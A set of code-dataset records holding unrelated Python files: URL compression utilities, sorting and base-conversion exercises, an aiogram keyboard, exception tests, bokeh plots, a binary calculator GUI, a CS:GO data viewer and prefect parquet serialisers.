+{"seq_id":"14732672158","text":"import logging\n\nfrom base64 import urlsafe_b64encode, urlsafe_b64decode\nfrom urllib.parse import urlencode, urlunparse, urlparse, parse_qs\nfrom zlib import compress, decompress\nfrom zlib import error as ZlibErr\nfrom binascii import Error as BinasciiErr\n\n\ndef url_encode(params: dict) -> str:\n \"\"\"Encode the URL parameters and zip them and create the whole URL using\n given data.\n\n :param params: All data necessary to create the URL:\n - scheme,\n - network location,\n - path,\n - query,\n - parameters.\n :type params: dict\n :returns: Encoded URL.\n :rtype: str\n \"\"\"\n\n url_params = params.get(\"params\", None)\n if url_params:\n encoded_params = urlsafe_b64encode(\n compress(urlencode(url_params).encode(\"utf-8\"), level=9)\n ).rstrip(b\"=\").decode(\"utf-8\")\n else:\n encoded_params = str()\n\n return urlunparse((\n params.get(\"scheme\", \"http\"),\n params.get(\"netloc\", str()),\n params.get(\"path\", str()),\n str(), # params\n params.get(\"query\", str()),\n encoded_params\n ))\n\n\ndef url_decode(url: str) -> dict:\n \"\"\"Parse the given URL and decode the parameters.\n\n :param url: URL to be parsed and decoded.\n :type url: str\n :returns: Paresed URL.\n :rtype: dict\n \"\"\"\n\n try:\n parsed_url = urlparse(url)\n except ValueError as err:\n logging.warning(f\"\\nThe url {url} is not valid, ignoring.\\n{repr(err)}\")\n return dict()\n\n if parsed_url.fragment:\n try:\n padding = b\"=\" * (4 - (len(parsed_url.fragment) % 4))\n params = parse_qs(decompress(\n urlsafe_b64decode(\n (parsed_url.fragment.encode(\"utf-8\") + padding)\n )).decode(\"utf-8\")\n )\n except (BinasciiErr, UnicodeDecodeError, ZlibErr) as err:\n logging.warning(\n f\"\\nNot possible to decode the parameters from url: {url}\"\n f\"\\nEncoded parameters: '{parsed_url.fragment}'\"\n f\"\\n{repr(err)}\"\n )\n return dict()\n else:\n params = None\n\n return {\n \"scheme\": parsed_url.scheme,\n \"netloc\": parsed_url.netloc,\n \"path\": parsed_url.path,\n \"query\": parsed_url.query,\n \"fragment\": parsed_url.fragment,\n \"params\": params\n }\n","repo_name":"FDio/csit","sub_path":"csit.infra.dash/app/cdash/utils/url_processing.py","file_name":"url_processing.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"8"}
+{"seq_id":"29544299045","text":"def find_smallest(arr):\n smallest = arr[0]\n smallest_index = 0\n for i, item in enumerate(arr):\n if item < smallest:\n smallest = item\n smallest_index = i\n return smallest_index\n\n\ndef selection_sort(arr): # with generator comprehension\n return [arr.pop(find_smallest(arr)) for i in range(len(arr))]\n","repo_name":"mikhailfed68/algorithms","sub_path":"algorithms/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"73262418181","text":"\"\"\"\nwat\n\"\"\"\n\n\ndef trier(f):\n def fn(n):\n try:\n return f(n)\n except:\n return 0\n return fn\n\ndechex=lambda n:int(\"0x%s\"%n,16)\ntest=lambda n: ((n**2) == trier(int)(hex(dechex(n)**2)[2:].replace('L','')), hex(dechex(n)),hex(dechex(n**2)))\nprint(\"\\n\".join([ \" %s * %s = %s\\n%s * %s = %s\" % (n,n,n**2,hex(dechex(n)),hex(dechex(n)),hex(dechex(n)**2)) for n in range(100001) if test(n)[0]]))\n\n\noctt=lambda n: oct(n) if n is not 0 else '00'\n\ndecbin=lambda n:int(\"0b%s\"%n,2)\ndecoct=lambda n:int(\"0%s\"%n,8)\ntestb=lambda n: ((n**2) == trier(int)(bin(trier(decbin)(n)**2)[2:]), bin(trier(decbin)(n)),bin(trier(decbin)(n**2)))\ntesto=lambda n: ((n**2) == int(octt(trier(decoct)(n)**2)[1:]), octt(trier(decoct)(n)),octt(trier(decoct)(n**2)))\n\n#hexmatches=[ n for n in range(100000) if test(n)[0]]\n#binmatches=[ n for n in range(100000) if testb(n)[0]]\n#octmatches=[ n for n in range(100000) if testo(n)[0]]\n\n\ndef base(b, n):\n digit = 0\n result = []\n assert b>0\n while b**(digit+1) <= n:\n digit+=1\n while digit>=0:\n value = n / (b**digit)\n if value > 9:\n value = chr(ord('a') + (value - 10))\n result.append(value)\n n%=b**digit\n digit-=1\n return ''.join(map(str,result))\n\ndef test_base(b, r=100001):\n results = []\n for i in range(r):\n try: \n w = int( str(i), b )\n if i**2 == int( base(b, w**2) ):\n results.append(i)\n except:\n continue\n return results\n","repo_name":"leif/lol","sub_path":"symmetry.py","file_name":"symmetry.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"}
+{"seq_id":"14217077474","text":"import time,sys\r\nprint(\"Programa Hoşgeldiniz...\")\r\nwhile True:\r\n x=int(input(\"Girmek İstediğiniz Sayıyı Giriniz: \"))\r\n a=x%5\r\n print(a)\r\n sec=input(\"Devam Etmek İstiyor Musunuz(E/H)? :\")\r\n if sec==\"H\" or sec==\"h\":\r\n print(\"Programdan Çıkış Yapıyorsunuz...\")\r\n time.sleep(3)\r\n sys.exit()\r\n elif sec==\"E\" or sec==\"e\":\r\n print(\"Devam Ediyorsunuz...\")\r\n time.sleep(1)","repo_name":"ataberkkoroglu/Python-Code-Exercise","sub_path":"Çalışma 8.py","file_name":"Çalışma 8.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7240191336","text":"import typing\n\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\n\nfrom . import callbacks\n\n\ndef buy_menu_keyboard(user_id: int, privilege: typing.List[dict]) -> InlineKeyboardMarkup:\n\n markup = InlineKeyboardMarkup()\n markup.add(\n InlineKeyboardButton(\n text='Пополнить баланс',\n callback_data=callbacks.replenishment.new(user_id)\n )\n )\n markup.inline_keyboard.append([])\n\n for key, value in privilege.items():\n markup.insert(\n InlineKeyboardButton(\n text=value['name'],\n callback_data=callbacks.privilege.new(key, user_id)\n )\n )\n\n return markup\n","repo_name":"MrArlian/order_04_07_23","sub_path":"keyboards/generated.py","file_name":"generated.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18402924685","text":"# Ensure that the local version of the runway module is used, not a pip\n# installed version\nimport sys\nsys.path.insert(0, '..')\nsys.path.insert(0, '.')\n\nimport pytest\nfrom runway.exceptions import *\nfrom runway import exceptions\nimport runway\n\ndef get_exceptions():\n error_names = [name for name in dir(exceptions) if name.endswith('Error')]\n return {name: getattr(exceptions, name) for name in error_names}\n\ndef check_to_response_method(err):\n response = err.to_response()\n assert type(response) == dict\n assert 'error' in response\n assert 'traceback' in response\n assert len(response['error']) > 0\n assert len(response['traceback']) > 0\n\ndef check_code_and_error(error_class,\n expected_code,\n expected_message,\n inpt=None):\n try:\n if inpt is not None:\n raise error_class(inpt)\n else:\n raise error_class()\n except RunwayError as err:\n assert err.code == expected_code\n assert err.message == expected_message\n\n# Going for the longest function name award here. The whole signature is 80 char\ndef test_all_runway_errors_have_code_and_message_props_and_to_response_method():\n for name, error in get_exceptions().items():\n try:\n if name == 'RunwayError':\n raise error()\n else:\n raise error('test error message.')\n except error as err:\n assert type(err.message) == str\n assert type(err.code) == int\n assert err.code >= 400\n check_to_response_method(err)\n\ndef test_runway_error():\n check_code_and_error(RunwayError, 500, 'An unknown error occurred.')\n\ndef test_missing_option_error():\n expect = 'Missing option: test_option.'\n check_code_and_error(MissingOptionError, 400, expect, inpt='test_option')\n\ndef test_missing_input_error():\n expect = 'Missing input: test_option.'\n check_code_and_error(MissingInputError, 400, expect, inpt='test_option')\n\ndef test_invalid_argument_error():\n expect = 'Invalid argument: test_option.'\n check_code_and_error(InvalidArgumentError, 400, expect, inpt='test_option')\n\ndef test_inference_error():\n expect = 'Error during inference: test_option.'\n check_code_and_error(InferenceError, 500, expect, inpt='test_option')\n\ndef test_unknown_command_error():\n expect = 'Unknown command: test_option.'\n check_code_and_error(UnknownCommandError, 404, expect, inpt='test_option')\n\ndef test_setup_error():\n expect = 'Error during setup: test_option.'\n check_code_and_error(SetupError, 500, expect, inpt='test_option')\n\ndef test_missing_argument_error():\n expect = 'Missing argument: test_option.'\n check_code_and_error(MissingArgumentError, 500, expect, inpt='test_option')\n\ndef test_print_exception(capsys):\n def foo(): raise RunwayError()\n def bar(): foo()\n try:\n bar()\n except RunwayError as err:\n err.print_exception()\n captured = capsys.readouterr()\n assert err.message in captured.err\n assert 'in foo' in captured.err\n assert 'in bar' in captured.err\n assert 'raise RunwayError' in captured.err\n","repo_name":"runwayml/model-sdk","sub_path":"tests/test_exceptions.py","file_name":"test_exceptions.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"91"}
+{"seq_id":"19477827167","text":"# This Python file uses the following encoding: utf-8\nimport PySimpleGUI as sg # on importe les modules depuis PysimpleGui\n\n\ndef ConversionMachine(nb,mode): # On définit toutes les convertions qu'on veut faire\n try: \n if mode == \"BIN2DEC\" : # ici pour passer de binaire à decimal \n decimal= int(nb,2) # on doit d'abord convertir le \"str\" en \"int\"\n return (str(decimal)) # après cela on retourne le résultat en \"str\"\n\n elif mode == \"DEC2BIN\": # ici pour passer de decimal à binaire\n decimal= int(nb) # on le convertit d'abord en \"int\"\n binaire = (bin(decimal)) # ensuite on le tranforme en binaire en utilisant la fonction \"bin() préexistante\"\n return (str(binaire)) # après cela on retourne le résultat en \"str\"\n\n elif mode == \"BIN2HEX\": # ici pour passer de binaire à hexadécimale\n binaire = int(nb,2) # on le convertit en \"int\"\n hexa = (hex(binaire)) # on convertit ce résultat en hexadécimal avec la fonction \"hex()\" préexistante\n return (str(hexa)) # après cela on retourne le résultat en \"str\"\n \n elif mode == \"HEX2BIN\":# ici pour passer de héxadécimale à binaire\n hexa = int(nb,16) # on le convertit en \"int\"\n binaire = (bin(hexa)) # ensuite on le tranforme en binaire en utilisant la fonction \"bin() préexistante\"\n return (str(binaire))# après cela on retourne le résultat en \"str\"\n\n elif mode == \"DEC2HEX\":# ici pour passer de decimal à hexadécimale\n decimal = int(nb,10) # on le convertit en \"int\"\n hexa = hex(decimal) #on convertit ce résultat en hexadécimal avec la fonction \"hex()\" préexistante\n return (str(hexa))# après cela on retourne le résultat en \"str\"\n \n elif mode == \"HEX2DEC\":# ici pour passer de decimal à binaire\n hexa = int(nb,16) # on le convertit en \"int\"\n decimal= (int(hexa)) \n return (str(hexa))# après cela on retourne le résultat en \"str\"\n except ValueError: # si il y'a une erreur causé par une valeur entré pas adéquate à la convertion choisie\n erreur = \"Vous n'avez pas entrer la bonne valeur pour le mode choisi\"\n return erreur\n\ndef addition(nb1,nb2): # fonction pour addtioner des valeurs binaires\n calcul = int(nb1,2) + int(nb2,2) # on transforme les deux valeurs binaire et int puis on les addtionne\n res = (bin(calcul)) # ensuite on le convertit au format binaire\n return((str(res))) # après cela on retourne le résultat en \"str\"\n\ndef multiplication(nb1,nb2): # fonction pour multiplier des valeurs binaires\n calcul = (int(nb1,2)) * (int(nb2,2))\n res = (bin(calcul))\n return((str(res)))\n\ndef soustraction(nb1,nb2): # fonction pour soustraire des valeurs binaires\n calcul = (int(nb1,2)) - (int(nb2,2))\n res = (bin(calcul))\n return((str(res)))\n\ndef interface3(): \n while True:\n event, values = window3.read() \n print(event, values)\n \n if event in (None, 'Exit'):\n break\n \n if event == \"ENTREZ\": # lorsqu'in click sur \"ENTREZ\", la fenêtre se cache et la première interface s'ouvre\n window3.Hide()\n interface1()\n\n\ndef interface2():\n if interface2.open == True:\n window2.UnHide()\n interface2.open = True\n while True:\n event, values = window2.read()\n print(event, values)\n \n if event in (None, 'Exit'):\n window.close() # lorqu'on click sur \"Exit\", les deux interfaces se ferment\n window2.close()\n break\n\n \n if event == 'ADDITION':\n res = addition(values['nb1'],values['nb2'])# on transforme les valeurs entrées avec la fonction défini avant\n res_dec = int(res,2)\n hexa = int(res,2)\n res_hex = (hex(hexa))\n window2['-OUTPUT-'].update(res) # on 
fait apparaître la clé \n window2['OUTPUT2'].update(res_dec) # on fait apparaître la clé \n window2['OUTPUT3'].update(res_hex)# on fait apparaître la clé \n\n \n if event == 'MULTIPLICATION':\n res = multiplication(values['nb1'],values['nb2']) # on transforme les valeurs entrées avec la fonction défini avant\n res_dec = int(res,2)\n hexa = int(res,2)\n res_hex = (hex(hexa))\n window2['-OUTPUT-'].update(res)# on fait apparaître la clé \n window2['OUTPUT2'].update(res_dec)# on fait apparaître la clé \n window2['OUTPUT3'].update(res_hex)# on fait apparaître la clé \n\n if event == 'SOUSTRACTION':\n res = soustraction(values['nb1'],values['nb2']) # on transforme les valeurs entrées avec la fonction défini avant\n res_dec = int(res,2)\n hexa = int(res,2)\n res_hex = (hex(hexa))\n window2['-OUTPUT-'].update(res)# on fait apparaître la clé \n window2['OUTPUT2'].update(res_dec)# on fait apparaître la clé \n window2['OUTPUT3'].update(res_hex)# on fait apparaître la clé \n \n\n if event == \"RETURN\": # lorqu'on click sur return on cache l'interface 2 et on ouvre l'interface 1\n window2.Hide() \n window.UnHide()\n interface1()\n\ndef interface1():\n while True:\n event, values = window.read()\n print(event, values)\n \n if event in (None, 'Exit'):\n window.close()\n window2.close()\n break\n \n \n if event == 'BIN2DEC':\n res = ConversionMachine(values['-IN-'],event)# on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res) # on fait apparaître la clé avec notre résultat\n \n if event == 'DEC2BIN':\n res = ConversionMachine(values['-IN-'],event)# on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res) # on fait apparaître la clé avec notre résultat\n\n if event == 'BIN2HEX':\n res = ConversionMachine(values['-IN-'],event)# on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res) # on fait apparaître la clé avec notre résultat\n\n if event == 'HEX2BIN':\n res = ConversionMachine(values['-IN-'],event) # on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res)# on fait apparaître la clé avec notre résultat\n \n if event == 'DEC2HEX':\n res = ConversionMachine(values['-IN-'],event) # on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res)# on fait apparaître la clé avec notre résultat\n\n if event == 'HEX2DEC':\n res = ConversionMachine(values['-IN-'],event) # on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res) # on fait apparaître la clé avec notre résultat\n \n if event == 'DEC2HEX':\n res = ConversionMachine(values['-IN-'],event) # on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res) # on fait apparaître la clé avec notre résultat\n\n\n\n if event == \"CALCULS\": # si on click sur “calcul“ on cache l'interface 1 et on ouvre l'interface 2\n window.Hide()\n interface2()\n\n\n# Programme principal\n\nimport PySimpleGUI as sg\n \nsg.theme('DarkPurple1') # le thème de couleur choisi\n \nlayout3= [[sg.Text('BIENVENUE SUR NSI WORLD', justification='center',size=(100,1), font=(\"Chalkboard\"))],[sg.Text('Ces interfaces ont été crée dans le but de faciliter vos calcul en utilisant le sytème binaire ou héxadécimal.',justification='center',size=(100,1), font=(\"Chalkboard\"))], [sg.Text(\" Nous espérons que cela vous sera utile!\",justification='center',size=(100,1), font=(\"Chalkboard\"))],[ sg.Text(\" Bonne Navigation!\", 
justification='center',size=(100,1), font=(\"Chalkboard\"))], [sg.Button('ENTREZ', pad=(380, 0), font=(\"Chalkboard\"))]]\n# ici on a défini tous les boutons pour notre page d'accueil\n \nwindow3 = sg.Window('ACCUEIL', layout3) # le nom en haut marge de l'interface\n\nsg.theme('DarkPurple1')# le thème de couleur choisi\n\nlayout = [[sg.Button('BIN2DEC',font=(\"Chalkboard\")), sg.Button('DEC2BIN',font=(\"Chalkboard\")),\n sg.Button('DEC2HEX',font=(\"Chalkboard\"))],\n [sg. Button('BIN2HEX',font=(\"Chalkboard\")), sg.Button('HEX2BIN',font=(\"Chalkboard\")),sg.Button('HEX2DEC',font=(\"Chalkboard\"))],\n [sg.Text('Valeur à convertir',font=(\"Chalkboard\"))],\n [sg.Input(key='-IN-')],\n [sg.Text('Résultat',font=(\"Chalkboard\")),\n\t\tsg.Text(size=(50,2), key='-OUTPUT-')],\n [ sg.Button('Exit',font=(\"Chalkboard\")), sg.Button('CALCULS',font=(\"Chalkboard\"))]]\n# ici on a défini tous les boutons et les clé qu'on va récuperer pour effectuer les convertions\nwindow = sg.Window('Machine à Convertir', layout) # le nom en haut marge de l'interface\n\nsg.theme('DarkPurple1') # le thème de couleur choisi\n \nlayout2 = [[sg.Button('ADDITION',font=(\"Chalkboard\")),sg.Button('MULTIPLICATION',font=(\"Chalkboard\")),sg.Button('SOUSTRACTION', font=(\"Chalkboard\"))],\n [sg.Text('Entrez votre premier valeur en binaire:',font=(\"Chalkboard\"))],\n [sg.Input(key='nb1')],\n [sg.Text('Entrez votre seconde valeur en binaire:',font=(\"Chalkboard\"))],\n [sg.Input(key='nb2')],\n [sg.Text('Résultats:',font=(\"Chalkboard\")),\n sg.Text(size=(15,1), key='-OUTPUT-')],[sg.Text('Décimal:',font=(\"Chalkboard\")),\n sg.Text(size=(15,1), key='OUTPUT2')],[sg.Text('Héxadécimal:',font=(\"Chalkboard\")),\n sg.Text(size=(15,1), key='OUTPUT3')],\n [sg.Button('Exit',font=(\"Chalkboard\")),sg.Button('RETURN',font=(\"Chalkboard\"))]]\n# ici on a défini tous les boutons et les clé qu'on va récuperer pour effectuer les calculs\nwindow2 = sg.Window('Calculatrice Binaire', layout2) # le nom en haut marge de l'interface\n\n\n\ninterface2.open = False\ninterface3()\n\nwindow.close() # on ferme les fenetres\nwindow2.close()\n","repo_name":"Jana-Ait-Said/Binary-Calculator","sub_path":"Jana_Snt_Machine_A_Convertir.py","file_name":"Jana_Snt_Machine_A_Convertir.py","file_ext":"py","file_size_in_byte":10214,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
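Underneath the PySimpleGUI layout above, the whole calculator rests on three standard-library conversions; stated on their own (the operand strings are arbitrary examples):

a, b = "1011", "0110"           # binary operands as strings
total = int(a, 2) + int(b, 2)   # int(s, 2) parses base-2
print(bin(total), hex(total))   # 0b10001 0x11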
+{"seq_id":"2254671602","text":"import numpy as np\nimport pandas as pd\nimport scipy.special\n\nfrom bokeh.layouts import gridplot\nfrom bokeh.models import BoxSelectTool, LassoSelectTool\nfrom bokeh.plotting import curdoc, figure, output_file, show\n\ndef make_plot(title, hist, edges, x, pdf, cdf):\n p = figure(title=title, tools='', background_fill_color=\"#fafafa\")\n p.quad(top=hist, bottom=0, left=edges[:-1], right=edges[1:],\n fill_color=\"navy\", line_color=\"white\", alpha=0.5)\n p.line(x, pdf, line_color=\"#ff8888\", line_width=4, alpha=0.7, legend_label=\"PDF\")\n p.line(x, cdf, line_color=\"orange\", line_width=2, alpha=0.7, legend_label=\"CDF\")\n\n p.y_range.start = 0\n p.legend.location = \"center_right\"\n p.legend.background_fill_color = \"#fefefe\"\n p.xaxis.axis_label = 'x'\n p.yaxis.axis_label = 'Pr(x)'\n p.grid.grid_line_color=\"white\"\n return p\ndef update(attr, old, new):\n inds = new\n if len(inds) == 0 or len(inds) == len(x):\n hhist1 = hzeros\n else:\n neg_inds = np.ones_like(x, dtype=np.bool)\n neg_inds[inds] = False\n hhist1, _ = np.histogram(x[inds], bins=hedges)\n\n hh1.data_source.data[\"top\"] = hhist1\n\ndataFile = './data/toc.csv'\ndata = pd.read_csv(dataFile)\n\nduration = pd.DatetimeIndex(data['Length (hh:mm:ss)'])\n\ny = duration.hour * 3600 + duration.minute * 60 + duration.second\n#y = y.sort_values()\nprint('\\n========================================================================')\nprint(data['Title'][0]+' by '+data['Author'][0]+', published in '+str(int(data['Published'][0])))\nprint('The mean chapter length is '+str(int(np.mean(y)/60))+' minutes')\nprint('Chapters range from '+str(int(np.min(y)/60))+' to '+str(int(np.max(y)/60))+' minutes')\nprint('========================================================================\\n')\n\n#wantCh = input('Would you like to see the chapter titles (yes/no)? :')\n#loadedData = None\n#if wantCh[0]=='y' and loadedData==False:\n# print(data['Chapter'])\n# loadedData = True\n#else :\n\n#x = [n for n in range(len(y))]\n\n# Normal Distribution\n\nmu, sigma = 0, 0.5\n\nmeasured = np.random.normal(mu, sigma, 1000)\nhist, edges = np.histogram(measured, density=True, bins=50)\n\nx = np.linspace(-2, 2, 1000)\npdf = 1/(sigma * np.sqrt(2*np.pi)) * np.exp(-(x-mu)**2 / (2*sigma**2))\ncdf = (1+scipy.special.erf((x-mu)/np.sqrt(2*sigma**2)))/2\n\np1 = make_plot(\"Normal Distribution (μ=0, σ=0.5)\", hist, edges, x, pdf, cdf)\n#output_file(data['Author']+'.html', title=data['Title'])\n\nshow(gridplot([p1], ncols=1, plot_width=600, plot_height=600, toolbar_location=None))\n#print(x,measured)\n","repo_name":"szunez/py-apps","sub_path":"bukowski/ch-histo.py","file_name":"ch-histo.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"16276866880","text":"# Written by Alexander Wurts\n# Data Science 3001 Final Project\n\nfrom tkinter import *\nfrom model.map import Map\nfrom model.datahandler import DataHandler\nfrom view.selectorcanvas import SelectionCanvas\n\n\n\nclass GUI:\n\n WIDTH = 1500\n HEIGHT = 1024\n\n SIDES = [(\"Terrorist\", 'Terrorist'),\n (\"Counter Terrorist\", \"CounterTerrorist\"),\n ('Both', \"Both\")]\n\n\n\n def __init__(self):\n self.root = Tk()\n self.root.geometry(str(GUI.WIDTH) + 'x' + str(GUI.HEIGHT))\n\n\n self.data = DataHandler()\n self.mainFrame = Frame(self.root)\n self.mainFrame.pack(side=LEFT, fill=BOTH, expand=True)\n\n\n self.currentFilter = DataHandler.EMPTY_FILTER\n\n self.mainscene()\n self.root.mainloop()\n\n\n def mainscene(self):\n\n def reload():\n # Box on Map Handler\n box = self.canvas.getBox()\n self.currentFilter = DataHandler.EMPTY_FILTER\n if box is not None:\n self.currentFilter['box'] = box\n else:\n self.currentFilter['box'] = None\n\n if boxAroundVar.get() == 'Attacker':\n self.currentFilter['box_around'] = 'Attacker'\n else:\n self.currentFilter['box_around'] = 'Victim'\n\n\n # Map Selector\n self.canvas.setMap(Map(currentMap.get()))\n self.currentFilter['map'] = \"'\" + currentMap.get() + \"'\"\n\n # Attack Side Selector\n if attSideVar.get() == \"Both\":\n self.currentFilter['att_side'] = None\n else:\n self.currentFilter['att_side'] = \"'\" + attSideVar.get() + \"'\"\n\n # Victim Side Selector\n if vicSideVar.get() == \"Both\":\n self.currentFilter['vic_side'] = None\n else:\n self.currentFilter['vic_side'] = \"'\" + vicSideVar.get() + \"'\"\n\n # User ID Entry\n if idEntry.get() != 'None':\n self.currentFilter['att_id'] = int(idEntry.get())\n else:\n self.currentFilter['att_id'] = None\n\n # Weapon Selection\n if weaponVar.get() != 'All':\n self.currentFilter['wp'] = \"'\" + weaponVar.get() + \"'\"\n else:\n self.currentFilter['wp'] = None\n\n for key, data in enumerate(vicAndAttRankRange):\n if data.get() != '':\n self.currentFilter['player_rank_range'][key] = int(data.get())\n else:\n # if key is an odd number set value to 18, else even set 0\n self.currentFilter['player_rank_range'][key] = 18 * (key % 2)\n\n\n self.canvas.addData(self.data.applyFilter(self.currentFilter))\n self.canvas.reloadImage()\n\n\n self.topFrame = Frame(self.mainFrame)\n self.topFrame.grid(column=1, row=0)\n\n ## Side Bar Configuration\n Button(self.topFrame, text='Reload', command=reload).grid(column=1, row=0)\n\n\n # Map Dropdown\n currentMap = StringVar(self.topFrame)\n currentMap.set(Map.MAPS[2])\n mapSelector = OptionMenu(self.topFrame, currentMap, *Map.MAPS)\n mapSelector.grid(column=1, row=1)\n Label(self.topFrame, text=\"Map: \").grid(row=1, column=0)\n\n # Att Side\n Label(self.topFrame, text=\"Attacker Side: \").grid(row=2, column=0)\n attSideFrame = Frame(self.topFrame)\n attSideFrame.grid(row=2, column=1)\n attSideVar = StringVar()\n attSideVar.set(\"Both\")\n for side in GUI.SIDES:\n b = Radiobutton(attSideFrame, text=side[0], variable=attSideVar, value=side[1])\n b.pack(anchor=W)\n\n # Vic Side\n Label(self.topFrame, text=\"Victim Side: \").grid(row=3, column=0)\n vicSideFrame = Frame(self.topFrame)\n vicSideFrame.grid(row=3, column=1)\n vicSideVar = StringVar()\n vicSideVar.set(\"Both\")\n for side in GUI.SIDES:\n b = Radiobutton(vicSideFrame, text=side[0], variable=vicSideVar, value=side[1])\n b.pack(anchor=W)\n\n # Att ID\n Label(self.topFrame, text=\"Attacker ID (Type None for all players): \").grid(row=4, column=0)\n idEntryVar = StringVar()\n 
idEntryVar.set(\"None\")\n idEntry = Entry(self.topFrame, textvariable=idEntryVar)\n idEntry.grid(row=4, column=1)\n\n # Victim and Attacker Rank Ranges\n labels = ['Min Attacker Rank: ', 'Max Attacker Rank: ', \"Min Victim Rank: \", \"Max Victim Rank\"]\n vicAndAttRankRange = []\n Label(self.topFrame, text=\"Attacker and Victim Rank (1-18, lower is better): \").grid(row=5, columnspan=2)\n for key, label in enumerate(labels):\n Label(self.topFrame, text=label).grid(row=6 + key, column=0)\n vicAndAttRankRange.append(Entry(self.topFrame))\n vicAndAttRankRange[-1].grid(row=6 + key, column=1)\n\n\n # Weapon\n weapons = ['All', 'USP', 'Glock', 'P2000', 'HE', 'Tec9', 'Deagle', 'MP9', 'UMP',\n 'Famas', 'P250', 'AK47', 'AWP', 'MP7', 'M4A1', 'FiveSeven',\n 'Incendiary', 'Scout', 'Unknown', 'Knife', 'Bizon', 'Flash', 'CZ',\n 'M4A4', 'Molotov', 'P90', 'AUG', 'Gallil', 'G3SG1', 'M249', 'SG556',\n 'Mac10', 'XM1014', 'DualBarettas', 'Nova', 'Swag7', 'Zeus',\n 'Scar20', 'SawedOff', 'Smoke', 'Negev', 'Decoy', 'Bomb']\n weaponVar = StringVar(self.topFrame)\n weaponVar.set(\"AK47\")\n weaponSelector = OptionMenu(self.topFrame, weaponVar, *weapons)\n weaponSelector.grid(row=10, column=1)\n Label(self.topFrame, text=\"Weapon: \").grid(row=10, column=0)\n\n\n # Box around attacker or victim\n Label(self.topFrame, text=\"Box Around: \").grid(row=11, column=0)\n boxAroundFrame = Frame(self.topFrame)\n boxAroundFrame.grid(row=11, column=1)\n boxAroundVar = StringVar()\n boxAroundVar.set(\"Both\")\n for side in ['Victim', 'Attacker']:\n b = Radiobutton(boxAroundFrame, text=side, variable=boxAroundVar, value=side)\n b.pack(anchor=W)\n\n self.canvas = SelectionCanvas(self.mainFrame, width=1024, height=1024)\n self.canvas.grid(column=0, row=0, stick=W)\n self.canvas.focus_force()\n\n self.canvas.addData(self.data.applyFilter(DataHandler.EMPTY_FILTER))\n self.canvas.reloadImage()\n\n\n\n\n\nGUI()\n","repo_name":"AJWurts/DS3001_Final_Project","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"665489708","text":"import os\nfrom os.path import exists\n\nimport cpr\nimport koopa.io\nimport pandas as pd\nimport xxhash\nfrom cpr.Resource import Resource\nfrom cpr.Serializer import cpr_serializer\nfrom cpr.Target import Target\nfrom prefect.serializers import JSONSerializer\nfrom prefect.utilities.importtools import from_qualified_name\n\n\nclass ParquetSource(Resource):\n def __init__(self, location: str, name: str, ext: str):\n super(ParquetSource, self).__init__(location=location, name=name, ext=ext)\n\n def get_data(self) -> pd.DataFrame:\n if self._data is None:\n assert os.path.exists(self.get_path()), f\"{self.get_path()} does not exist.\"\n self._data = koopa.io.load_parquet(self.get_path())\n\n return self._data\n\n\nclass ParquetTarget(Target):\n def __init__(\n self,\n location: str,\n name: str,\n ext: str = \".parq\",\n data_hash: str = None,\n ):\n super(ParquetTarget, self).__init__(\n location=location, name=name, ext=ext, data_hash=data_hash\n )\n\n def get_data(self) -> pd.DataFrame:\n if self._data is None:\n assert os.path.exists(self.get_path()), (\n f\"{self.get_path()} does not \" f\"exist.\"\n )\n self._data = koopa.io.load_parquet(self.get_path())\n\n return self._data\n\n def _hash_data(self, data) -> str:\n data_hash = pd.core.util.hashing.hash_pandas_object(data).values.tobytes()\n return xxhash.xxh3_64(data_hash).hexdigest()\n\n def _write_data(self):\n if self._data is not None and not exists(self.get_path()):\n koopa.io.save_parquet(self.get_path(), self._data)\n\ndef target_decoder(result: dict):\n \"\"\"\n Decoder which takes care of cpr objects.\n\n Otherwise prefect_json_object_decoder is used.\n \"\"\"\n if \"__class__\" in result:\n if result[\"__class__\"].startswith(\"koopaflows.cpr_parquet.\"):\n clazz = from_qualified_name(result[\"__class__\"])\n return clazz(**result[\"data\"])\n else:\n return cpr.Serializer.target_decoder(result)\n\n return result\n\ndef koopa_serializer(dumps_kwargs={}) -> JSONSerializer:\n \"\"\"JSONSerializer configured to work with cpr objects.\"\"\"\n return JSONSerializer(\n object_encoder=\"cpr.Serializer.target_encoder\",\n object_decoder=\"koopaflows.cpr_parquet.target_decoder\",\n dumps_kwargs=dumps_kwargs,\n )","repo_name":"fmi-basel/gchao-koopa-flows","sub_path":"src/koopaflows/cpr_parquet.py","file_name":"cpr_parquet.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
